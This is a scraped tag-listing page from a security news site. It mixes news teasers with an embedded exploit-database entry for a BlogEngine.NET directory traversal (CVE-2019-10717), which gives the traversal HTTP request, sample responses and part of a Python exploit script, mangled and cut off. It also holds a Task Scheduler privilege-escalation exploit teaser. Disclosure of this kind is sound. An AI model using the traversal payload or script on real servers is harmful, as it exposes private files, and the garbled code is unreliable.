Tag: list

Shades of BlueKeep: Wormable Remote Desktop Bugs Top August Patch Tuesday List
august patch tuesday, Black Hat 2019

Shades of BlueKeep: Wormable Remote Desktop Bugs Top August Patch Tuesday List

The flaws allow remote code-execution without user interaction or authentication, and are highly exploitable. . Shades of BlueKeep: Wormable Remote Desktop Bugs Top August Patch ... Read More

New Cyber Threat list released by Cloud Security Alliance
cloud computing, cloud security

New Cyber Threat list released by Cloud Security Alliance

Cloud Security Alliance (CSA) has released a list of 11 cyber threats which the users of cloud computing were facing, identifying data breaches as the ... Read More

Industry Groups Share Anti-Piracy Wish List With US Government
afeat, Creative Future

Industry Groups Share Anti-Piracy Wish List With US Government

Earlier this month, the US Department of Commerce requested input from the public on several piracy-related matters. Specifically, it wanted to know more about counterfeit ... Read More

Published a possible list of mandatory pre-installation of domestic software
hacker, SecurityLAB

Published a possible list of mandatory pre-installation of domestic software

Specialists of the Internet Development Institute analyzed the market of domestic mobile software. This month a bill was introduced in the State Duma of the ... Read More

Microsoft asked for a closed list of Linux developers
hacker, SecurityLAB

Microsoft asked for a closed list of Linux developers

Organizations from the list exchange data about vulnerabilities before they are published.Microsoft has applied to be included in the list of Linux distribution developers who ... Read More

Local - Privilege Escalation Exploits, Local Exploit

BlogEngine.NET 3.3.6/3.3.7 – ‘path’ Directory Traversal[(i[0]# Exploit Title: Directory Traversal on BlogEngine.NET # Date: 24 Jun 2019 # Exploit Author: Aaron Bishop # Vendor Homepage: //blogengine.io/ # Version: v3.3.7 # Tested on: 3.3.7, 3.3.6 # CVE : 2019-10717 1. Description ============== BlogEngine.NET is vulnerable to a directory traversal. The page parameter, passed to /api/filemanager, reveals the contents of the directory. 2. Proof of Concept ============= Log in to the application and submit a GET request to /api/filemanager: Request: ~~~ GET /api/filemanager?path=/../../ HTTP/1.1 Host: $RHOST User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: $COOKIE Connection: close Upgrade-Insecure-Requests: 1 ~~~ Depending on how the request is submitted, the response may be XML or JSON XML Response ~~~ HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/xml; charset=utf-8 Expires: -1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 15 May 2019 01:58:46 GMT Connection: close Content-Length: 13030 5/14/2019 6:58:46 PM Directory ~/App_Data/files/../.. false … 0 … ~~~ JSON Response ~~~ HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 15 May 2019 02:35:13 GMT Connection: close Content-Length: 10011[ { “IsChecked”:false, “SortOrder”:0, “Created”:”5/14/2019 7:35:13 PM”, “Name”:”…”, “FileSize”:””, “FileType”:0, “FullPath”:”~/App_Data/files/../..”, “ImgPlaceholder”:”” } … ~~~ import argparse import json import os import re import requests import sys “”” Exploit for CVE-2019-10717 CVE Identified by: Aaron Bishop Exploit written by: Aaron Bishop Outputs list of filenames found in web root python exploit.py -t $RHOST ?path=/../.. /../../archive.aspx /../../archive.aspx.cs /../../archive.aspx.designer.cs /../../BlogEngine.NET.csproj /../../BlogEngine.NET.csproj.user /../../contact.aspx /../../contact.aspx.cs /../../contact.aspx.designer.cs “”” urls = { “login”: “/Account/login.aspx”, “traversal”: “/api/filemanager” } def make_request(session, method, target, data={}): proxies = { “http”: “127.0.0.1:8080”, “https”: “127.0.0.1:8080″ } if method == ‘GET’: r = requests.Request(method, target, params=data) elif method == ‘POST’: r = requests.Request(method, target, data=data) prep = session.prepare_request(r) resp = session.send(prep, verify=False, proxies=proxies) return resp.text def login(session, host, user, passwd): resp = make_request(session, ‘GET’, host+urls.get(‘login’)) login_form = re.findall(”, resp) login_data = dict([(i

- Exploit Details ,i) for i in login_form>) login_data.update({'ctl00$MainContent$LoginUser$UserName': user}) login_data.update({'ctl00$MainContent$LoginUser$Password': passwd}) resp = make_request(session, 'POST', host+urls.get('login'), login_data) def parse(body, path, outfile): paths = json.loads(body) ... Read More

Operators of Triton malware added to the list of objects attacked by power companies
hacker, SecurityLAB

Operators of Triton malware added to the list of objects attacked by power companies

Previously, the group’s interests were oil and gas enterprises. The hacker grouping Xenotime, tied by security experts with malware attacks for the Triton process control ... Read More

Roskomnadzor included the Tinder dating app on the ARI list
hacker, SecurityLAB

Roskomnadzor included the Tinder dating app on the ARI list

The service is obliged to keep the users' correspondence for half a year and provide data upon the request of law enforcement agencies. Roskomnadzor entered ... Read More

remote code execution

Microsoft Windows (x86) – Task Scheduler’ .job’ Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation

- Exploit Details Task Scheduler .job import arbitrary DACL write Tested on: Windows 10 32-bit Bug information: There are two folders for tasks. c:windowstasks c:windowssystem32tasks ... Read More